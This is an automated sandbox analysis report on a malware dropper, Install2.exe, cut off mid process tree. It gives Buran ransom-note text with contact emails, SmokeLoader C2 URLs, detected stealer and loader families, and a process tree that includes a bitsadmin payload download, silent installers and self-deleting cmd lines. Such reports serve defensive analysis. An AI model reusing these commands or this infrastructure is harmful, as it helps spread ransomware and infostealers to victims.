Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 09:56

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 124-2DB-2F2 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TelegramRat 1 IoCs

    Telegram_rat.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Nirsoft 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 38 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1016
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1000
      • C:\Users\Admin\AppData\Roaming\btfdhbv
        C:\Users\Admin\AppData\Roaming\btfdhbv
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:2200
      • C:\Users\Admin\AppData\Roaming\rjfdhbv
        C:\Users\Admin\AppData\Roaming\rjfdhbv
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:3532
        • C:\Users\Admin\AppData\Roaming\rjfdhbv
          C:\Users\Admin\AppData\Roaming\rjfdhbv
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4608
      • C:\Users\Admin\AppData\Roaming\btfdhbv
        C:\Users\Admin\AppData\Roaming\btfdhbv
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4760
      • C:\Users\Admin\AppData\Roaming\rjfdhbv
        C:\Users\Admin\AppData\Roaming\rjfdhbv
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4780
        • C:\Users\Admin\AppData\Roaming\rjfdhbv
          C:\Users\Admin\AppData\Roaming\rjfdhbv
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4664
      • C:\Users\Admin\AppData\Roaming\btfdhbv
        C:\Users\Admin\AppData\Roaming\btfdhbv
        2⤵
        • Executes dropped EXE
        PID:5092
      • C:\Users\Admin\AppData\Roaming\rjfdhbv
        C:\Users\Admin\AppData\Roaming\rjfdhbv
        2⤵
        • Executes dropped EXE
        PID:4500
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1088
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1160
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1392
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1300
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
              • Modifies registry class
              PID:2748
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2728
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2696
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2520
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2512
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1888
                  • C:\Users\Admin\AppData\Local\Temp\Install2.exe
                    "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:572
                    • C:\Users\Admin\AppData\Local\Temp\is-LL0RG.tmp\Install2.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-LL0RG.tmp\Install2.tmp" /SL5="$301DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2780
                      • C:\Users\Admin\AppData\Local\Temp\is-J24B6.tmp\Ultra.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-J24B6.tmp\Ultra.exe" /S /UID=burnerch1
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3144
                        • C:\Program Files\Windows Multimedia Platform\TCWWZRVKWR\ultramediaburner.exe
                          "C:\Program Files\Windows Multimedia Platform\TCWWZRVKWR\ultramediaburner.exe" /VERYSILENT
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4000
                          • C:\Users\Admin\AppData\Local\Temp\is-VQ7OU.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-VQ7OU.tmp\ultramediaburner.tmp" /SL5="$7002E,281924,62464,C:\Program Files\Windows Multimedia Platform\TCWWZRVKWR\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:3760
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              6⤵
                              • Executes dropped EXE
                              PID:1648
                        • C:\Users\Admin\AppData\Local\Temp\30-2e7ed-cc8-6ff89-4004065ef6923\Kyxazhibeda.exe
                          "C:\Users\Admin\AppData\Local\Temp\30-2e7ed-cc8-6ff89-4004065ef6923\Kyxazhibeda.exe"
                          4⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1600
                        • C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Dakeshodujy.exe
                          "C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Dakeshodujy.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1744
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\exvhb4iz.vd1\instEU.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4196
                            • C:\Users\Admin\AppData\Local\Temp\exvhb4iz.vd1\instEU.exe
                              C:\Users\Admin\AppData\Local\Temp\exvhb4iz.vd1\instEU.exe
                              6⤵
                              • Executes dropped EXE
                              PID:4612
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tuksomet.n34\google-game.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4504
                            • C:\Users\Admin\AppData\Local\Temp\tuksomet.n34\google-game.exe
                              C:\Users\Admin\AppData\Local\Temp\tuksomet.n34\google-game.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:4704
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                7⤵
                                • Loads dropped DLL
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:5024
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qqdx2umi.hpy\y1.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1732
                            • C:\Users\Admin\AppData\Local\Temp\qqdx2umi.hpy\y1.exe
                              C:\Users\Admin\AppData\Local\Temp\qqdx2umi.hpy\y1.exe
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:5000
                              • C:\Users\Admin\AppData\Local\Temp\Tij30vfCfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\Tij30vfCfa.exe"
                                7⤵
                                  PID:4352
                                  • C:\Users\Admin\AppData\Roaming\1619352113973.exe
                                    "C:\Users\Admin\AppData\Roaming\1619352113973.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619352113973.txt"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4776
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Tij30vfCfa.exe"
                                    8⤵
                                      PID:4584
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        9⤵
                                        • Runs ping.exe
                                        PID:5012
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qqdx2umi.hpy\y1.exe"
                                    7⤵
                                      PID:4236
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:4572
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gekxnh4t.4xm\askinstall39.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4372
                                  • C:\Users\Admin\AppData\Local\Temp\gekxnh4t.4xm\askinstall39.exe
                                    C:\Users\Admin\AppData\Local\Temp\gekxnh4t.4xm\askinstall39.exe
                                    6⤵
                                      PID:5012
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:4768
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:2152
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\biuqq42z.jxr\inst.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4560
                                      • C:\Users\Admin\AppData\Local\Temp\biuqq42z.jxr\inst.exe
                                        C:\Users\Admin\AppData\Local\Temp\biuqq42z.jxr\inst.exe
                                        6⤵
                                          PID:4712
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iuots4sb.e0w\SunLabsPlayer.exe /S & exit
                                        5⤵
                                          PID:2176
                                          • C:\Users\Admin\AppData\Local\Temp\iuots4sb.e0w\SunLabsPlayer.exe
                                            C:\Users\Admin\AppData\Local\Temp\iuots4sb.e0w\SunLabsPlayer.exe /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:4964
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4488
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4412
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4796
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:1964
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:4816
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:4268
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:5028
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          7⤵
                                                          • Download via BitsAdmin
                                                          PID:4688
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:2552
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                            PID:4676
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:2856
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:3560
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4564
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5012
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2200
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:3916
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      PID:2972
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        PID:3172
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4916
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4224
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4676
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                              PID:4268
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4948
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:1268
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrAE25.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4448
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:4468
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zr4ig031.i3q\GcleanerWW.exe /mixone & exit
                                                                            5⤵
                                                                              PID:4364
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sy52wjpj.anv\toolspab1.exe & exit
                                                                              5⤵
                                                                                PID:4104
                                                                                • C:\Users\Admin\AppData\Local\Temp\sy52wjpj.anv\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\sy52wjpj.anv\toolspab1.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4456
                                                                                  • C:\Users\Admin\AppData\Local\Temp\sy52wjpj.anv\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\sy52wjpj.anv\toolspab1.exe
                                                                                    7⤵
                                                                                      PID:4308
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xb141udv.azv\c7ae36fa.exe & exit
                                                                                  5⤵
                                                                                    PID:4300
                                                                                    • C:\Users\Admin\AppData\Local\Temp\xb141udv.azv\c7ae36fa.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\xb141udv.azv\c7ae36fa.exe
                                                                                      6⤵
                                                                                        PID:2552
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\visc0fid.c2i\app.exe /8-2222 & exit
                                                                                      5⤵
                                                                                        PID:4468
                                                                                        • C:\Users\Admin\AppData\Local\Temp\visc0fid.c2i\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\visc0fid.c2i\app.exe /8-2222
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4820
                                                                                          • C:\Users\Admin\AppData\Local\Temp\visc0fid.c2i\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\visc0fid.c2i\app.exe" /8-2222
                                                                                            7⤵
                                                                                              PID:4016
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                  1⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4020
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Checks processor information in registry
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies registry class
                                                                                    PID:2820
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4136
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  PID:4736
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4572
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  PID:5016
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                  1⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  PID:2800
                                                                                • C:\Users\Admin\AppData\Local\Temp\BF65.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\BF65.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:4044
                                                                                • C:\Users\Admin\AppData\Local\Temp\BF64.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\BF64.exe
                                                                                  1⤵
                                                                                    PID:1268
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\udaucqm\
                                                                                      2⤵
